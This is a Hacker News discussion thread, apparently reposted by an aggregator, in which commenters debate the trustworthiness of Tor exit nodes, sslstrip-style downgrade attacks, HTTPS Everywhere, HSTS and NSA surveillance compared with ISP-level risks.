HN Theater @HNTheaterMonth

moxie, the founder of OWS, was already well-known before Snowden. SSLstrip, for example: https://moxie.org/software/sslstrip/ and this DEFCON talk where he presents multiple attacks on cert validation: https://youtube.com/watch?v=ibF36Yyeehw

Nope. https://www.youtube.com/watch?v=ibF36Yyeehw

I'm probably going to take some flack for this, but I don't trust Tor. When you access Tor, you're masking your origin IP to the remote address by trusting one of a couple hundred volunteer exit nodes who raised their hands and said "Trust me! You can route all of your internet traffic through me and I promise I won't monitor or inject anything..."

I think most Tor users don't have an adequate understanding of the threat model. It doesn't help that the Tor Project has at times upsold the anonymity provided to a ludicrous extent[1] (to be fair, they do address the risk in their FAQ[2]). Is it more likely that that Comcast will MITM me, or some random exit node? I might expect Comcast to maybe inject an ad into an HTTP connection or do some DNS redirect to shoot me an advertisement, but I don't worry about them stealing my credit card or injecting a buffer overflow or something. In fact, they have a profit incentive to not do so. I don't have that guarantee with a random exit node. It might be a generous privacy advocate, or it might be someone who has more nefarious profit incentive in mind[3]. If you're only connecting through Tor just to avoid the NSA, then you have to assume that both a) the NSA is targeting you to begin with, and b) that exit node you're going through isn't controlled by the NSA (or GCHQ/FSB/PLA/etc).

sslstrip[4] undermines the prospect of protecting yourself by connecting solely over SSL through Tor. Even then, in my experience more than half of the sites I visit don't support SSL to begin with. The HTTPS Everywhere plugin that EFF provides and is included in the Tor Browser Bundle is implemented backwards - it connects over SSL only when the site matches a whitelist[5] (I use KB SSL Enforcer on Chrome myself).

Sorry if this came off as a rant - I just see too many articles like this that prop up Tor as a silver bullet without discussing the risks and establishing an adequate threat model that allows the user to make an informed decision regarding the risks/benefits of using Tor.

[1] http://betaboston.com/news/2014/05/07/as-domestic-abuse-goes...

[2] https://www.torproject.org/docs/faq.html.en#AttacksOnOnionRo...

[3] http://threatpost.com/small-number-of-malicious-tor-exit-rel...

[4] https://www.youtube.com/watch?v=ibF36Yyeehw

[5] https://www.eff.org/https-everywhere/faq

⬐ growupkids

I hope you realize you just described the entire Internet. Which is the ultimate irony of complaining about the security of tor: you're trusting someone else to forward your packets. Yes, yes they can modify the traffic to and from your host, and yes, yes they can monitor everything you're doing. The difference with the non-tor Internet is that it's far far easier to do that.

⬐ csandreasen

You're absolutely correct in that it is a trust issue. However, when Comcast forwards my packets they have both a profit incentive to not go stealing my all of my credit card info (their customers would quickly take their business elsewhere) and a legal incentive (they're a known entity inside the US - someone's going to court). With Tor, I'm putting all of my trust in someone likely on the other side of the globe who has only given me no more identifying information than an IP address and promises no more than that they'll offer me free bandwidth. That person could have set up shop a few hours ago and may be gone tomorrow.

And what if they did sslstrip your connection to your bank's website? Would Tor catch it if the exit node only did it for a week or two and only to .5% of the connections? Would any of the victims be able to determine the source of the attack? How many people on Tor actually keep track of what exit nodes their traffic is going through?

⬐ stephen_g

What's the point of using Tor to access your bank's website though? I don't think that is a normal use case at all because there's no point using an anonymity network for that, because your bank probably knows who you are. Exactly the same as with credit cards.

If you're going to pay for something over Tor, it should probably be with a prepaid credit card (or bitcoin). And if you're buying something anonymously then you know you're taking a risk.

Same as with email accounts or any other account. It doesn't make sense to use any account through Tor that you've used outside it, as it could already be identifying information.

⬐ jessaustin

...Comcast...their customers would quickly take their business elsewhere...

This isn't always possible for Comcast customers.

⬐ growupkids

Or many customers in the US. For most consumers you have one choice of broadband provider due to local government monopoly grants. It's either comcast, or verizon or another big telco/cable company, but rarely is there a second equivalent option.

⬐ growupkids

Again, the same can be said of non-tor traffic.

How many people keep track of the route their packets take? (Dare I say none?) How many third parties will it pass thru? (Many). How many of them can trusted to not monitor you (this is why ssl and even ssh was invented), how many have adequate security controls to prevent data theft (again this also why ssl and other tools were invented), how many can be trusted to not forward your data to a hostile government, etc.

It's the same problem, trust. And since when was the internet considered a trusted network? Calling out Tor for inherent trust issues with the path is ironic, neither the internet nor tor is a trusted network. Tors solving a different problem: monitoring. Both have the same problem which neither solves: tampering, but other technologies do (ssh, TLS, etc.)

In both cases, you shouldn't trust a third party (or an intruder into that third parties network) to either not modify your packets or to respect your privacy. At least tor helps with the later, the former isn't solved by blindly trusting an ISP or assuming your entire route is trusted (NSA anyone?).

Trust no untrusted network. At least tor is Upfront about this.

⬐ 3pt14159

I think the key is that Tor should only be used with HTTPS connections. Anyone that's like "zomg, my HTTP connections are being recorded by Tor exit nodes don't use Tor!" is kinda being a bit silly. I know personally people the have designed hardware for major ISPs to specifically record HTTP traffic for non-benign purposes.

I don't trust Tor for a completely different reason: you become a threat. Just by sending Tor traffic from your home, you're flagged as a potential active monitoring target, and I don't really need the additional heat.

⬐ darsham

>you're masking your origin IP to the remote address by trusting one of a couple hundred volunteer exit nodes

No! When using Tor, you are not trusting any single node, and that's the whole point. The exit node does not know your IP or anything else about you, and the other nodes do not know what server you're communicating with. And you should never send any personal information over Tor, such as your credit card, because the end server would be able to identify you and steal that information (and why would you trust the end server? The idea is not to trust anyone when using Tor.)

⬐ AJ007

While man-in-the-middle attacks may be detectible (http://www.cs.kau.se/philwint/spoiled_onions/techreport.pdf) just recording all the unencrypted traffic would be worthwhile.

The simple answer is most people that use an electronic device -- Tor or otherwise -- have no idea what they are doing. Because Tor is advertised as extremely safe, they think they are safe. Anyone wanting an interesting stream of data just has to operate as many exit nodes as their budget can handle.

⬐ e12e

Additionally, I'd assume that most organizations that are able to run or back-door a large percentage of TOR exit nodes are also able to mint SSL certificates under keys that most browsers would accept as legitimate.

⬐ totoroisalive

This same argument applies for almost everything related with the internet and technology.

When you use TOR you should be aware of the trade offs.

The golden rule is don't trust something you don't understand, even if you do, don't trust.

⬐ gipp

Sure, but this is why pretty much every resource on Tor stresses the importance of end-to-end encryption for sensitive or identifying info.

⬐ csandreasen

That's why I mention sslstrip (check out the presentation - it's scary) and overall lack of SSL on the internet. To provide some anecdata, my browser window currently has 8 tabs open right now.

Those that support HTTPS: news.ycombinator.com; twitter.com; www.torproject.org

Those that don't: cryptome.org (!); zzaper.co.uk (the Vim tips article from a few days ago); forbes.com; vimeo.com; nytimes.com

End-to-end encryption would be great, but the internet at large just isn't there yet in terms of both HTTPS support on most sites and safeguards against SSL tampering.

⬐ glomph

What is the use to an exit node in knowing that someone is reading cryptome zzaper forbes vimeo and nytimes? Presumably you are not going to transfer any identifying info to these sites.

⬐ discreditable

Tracking cookies used across various services are known to be used by the NSA to identify users.

⬐ id

That's why the Tor Browser clears cookies on close. But you are free to disable them entirely.

⬐ FedRegister

If you're using the same browser for Tor and non-Tor traffic (and therefore the same cookies) then You Are Doing It Wrong.

⬐ hackcasual

I will say safeguards against tampering are getting better for newer browsers. I'm working on a software stack for PirateBox type systems but focused on security, so I get a pretty good glimpse at how a lot of sites handle incorrect certs, since it's an internetless portal and redirects everything to its hosted SSL page. Both gmail and hackernews will refuse to load at all, as they properly support HSTS. Well gmail "cheats" and is hard coded in chrome.

⬐ frandroid

So how does Gmail do it with other browsers?

⬐ hackcasual

http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security#...

⬐ bigbugbag

a) The NSA collects first and targets later b) The NSA may control the exit node your traffic is going through vs the NSA collects all network traffic from everywhere.

Using tor do add an additional anonymity layer.

⬐ lern_too_spel

This is incorrect and dangerously misleading. The NSA collects data that crosses the US border. An internet user in America is more likely to have their data cross a border if they use TOR. In this respect, TOR makes your data more likely to be collected unless you have reason to believe you're already being monitored anyway.

⬐ chopin

But only exit nodes are the problem here. Traffic between nodes is encrypted anyway. If the encryption is sound (and there is no reason to assume the contrary), they may collect as much as they want.

There is anyway no guarantee at all, that non-TOR traffic doesn't cross borders. And you can't assume that any three letter agency acts within the (intended) legal boundaries. To be safe, only end-to-end encryption helps.

⬐ anonymousDan

My worry is that by using Tor at all you become a target for active monitoring, even if the content and destination of your Tor communication can't be decrypted.

⬐ chopin

Which is why it is important that many people use it. I don't think it is a viable strategy to MITM everyone (at least it will not go undetected), if that is what you assume being a target for active monitoring. Or to send agents to every house. If we are forcing them to do that, we have won.

⬐ lern_too_spel

Sorry if I wasn't clear, but this is exactly my point. Most of your traffic as an American will stay within the country's borders because most of the services you access are in the US. By using TOR, your traffic will now appear to come from an exit node that has a greater than zero probability of being outside the US. The average American user thus has increased the likelihood of their data being analyzed by the NSA by using TOR. Under great-grandparent's particular threat model, the user is worse off.

Also, we can assume that the NSA operates within those bounds because that's what Snowden's leaked documents say in describing their systems. We have their internal documentation as proof.

⬐ belorn

Lets address your concern by talking about security and probability for each of those issues.

Credit card thieves in Comcast vs in TOR. Given the number of employees who has remote access to customers routers (ie support), sysadmins that has remote server access, and personale who has physical access to switching equipment, whats the risk that one of those people has a criminal record? This will always be non-zero, and one can never actually test it.

In TOR, this risk can be tested[1]. Exit note can be probed by sending unique credit card numbers or other profitable personal information, and then observed by seeing what the node owner does. If they act on the information, the node then get blocked. You can not do this with Comcast since your identity is known to the personal of Comcast.

The NSA threat, as talked about, is reduced by using TOR. Doing statistical analysis is in theory possible but in practice very hard. Out of all the Snowden leaks, not a single one present this as a ongoing work happening. Non-tor traffic analysis is however presented as business-as-usual and should be assumed to happen at every point in the network.

Last, the HTTPS Everywhere you mention is a direct answer to the SSLstrip for the most commonly used websites. Claiming it is implemented backwards because it uses a blacklist is a bit unfair, since blacklist and whitelist each has their own tradeoff in security. HTTPS Everywhere has no false positive and protect against the common threat, but will be vulnerable against uncommon ones. If they had gone with a HTTPS-only approach, it would have caused a extreme amount of false-positives, and users would have turned it off. This trade-off (security vs false positives) is commonly the distinction between user products and server products.

KB SSL Enforcer do not protect against sslstrip and MITM[2] for new installations. If the Tor Browser Bundle included KB SSL Enforcer, it would worsen the security of the Bundle compared to HTTPS Everywhere, and would be counter to the design. Rather than leaving no records of the sites you go to, KB SSL Enforcer have to record and permanent store it.

[1] http://www.slideshare.net/FreeLeaks/exposing-malicious-tor-e...

[2] https://code.google.com/p/kbsslenforcer/wiki/FAQ

⬐ None

None

⬐ walls

The Snowden leaks most definitely present this as ongoing work: http://www.theguardian.com/world/interactive/2013/oct/04/tor...

⬐ hackerboos

Are malicious exit nodes actively blocked by the project?

⬐ belorn

Yes. The list of tor nodes are handled by a small list of directory authorities. They vote on a list, which then each client tally in order to create a list called consensus. Since the number of directory authorities are few, bad nodes get quite fast blocked.

If you want to see nodes that are blocked, http://torstatus.blutmagie.de/ looks to be a good site. There has also been several research projects which has explored different avenues for finding bad nodes, and the TOR Project created a few years ago a python project which incorporated most those methods to automatically scan for malicious nodes (https://svn.torproject.org/svn/torflow/trunk/README).

⬐ csandreasen

You can test Comcast in the same way that you can test a Tor exit node - the technique is exactly the same. The threat of a rogue network admin is similar to that of a rogue waitress stealing credit card info - significant criminal liability if caught. To top that, people in a position to carry out such an attack are generally easily identifiable by their employers if there is a criminal investigation. The same can't be said for the administrator of a Tor node in a foreign country.

The NSA threat relies on the assumption that they are targeting you specifically; the risk with a rogue exit node is that you are exposing yourself to an adversary that doesn't care who their victim - i.e. most criminals. My issue with Tor advocacy is that it's attempting to mitigate the risk of a perceived adversary by exposing users to a much more realistic threat. My spouse and I have both had our credit cards stolen before, but I've never had any reason to believe that I've been targeted by the NSA.

There is a definite tradeoff with regards to the whitelist/blacklist model, but ultimately both solutions are really just patching over inherent flaws in SSL trust model. I wasn't clear in earlier post - my issue is not necessarily with the HTTPS Everywhere model, but rather the perception that it gives the user pervasive end-to-end encryption and solves the issue of rogue exit nodes.

⬐ belorn

If you test comcast in the same fashion, the rouge employee can see that you are sending several thousands unique credit-card number to some website and are thus behaving in a very strange and obvious manner. They can see plainly if the request comes the investigating branch of the police.

With a tor exit-node, the operator can't identify who is sending them the traffic. They can't distinguish a investigating police from a victim.

You can disagree and think that rouge Comcast employees are easier identified than Tor operator. This is a trust question, and everyone is free to pick who they trust and who they don't. The argument given in favor of Comcast just don't sway me, and it would likely require a research paper with test data in order to actually prove what has higher risk associated with it.

The NSA do not target people specifically. That was proven by the revelations from Snowden, and has been quite obvious for quite a long time. NSA doesn't care who their victim is when they are collecting the information. It is cheaper and more effective to target everyone, and then data mine the result after everything is in their hands.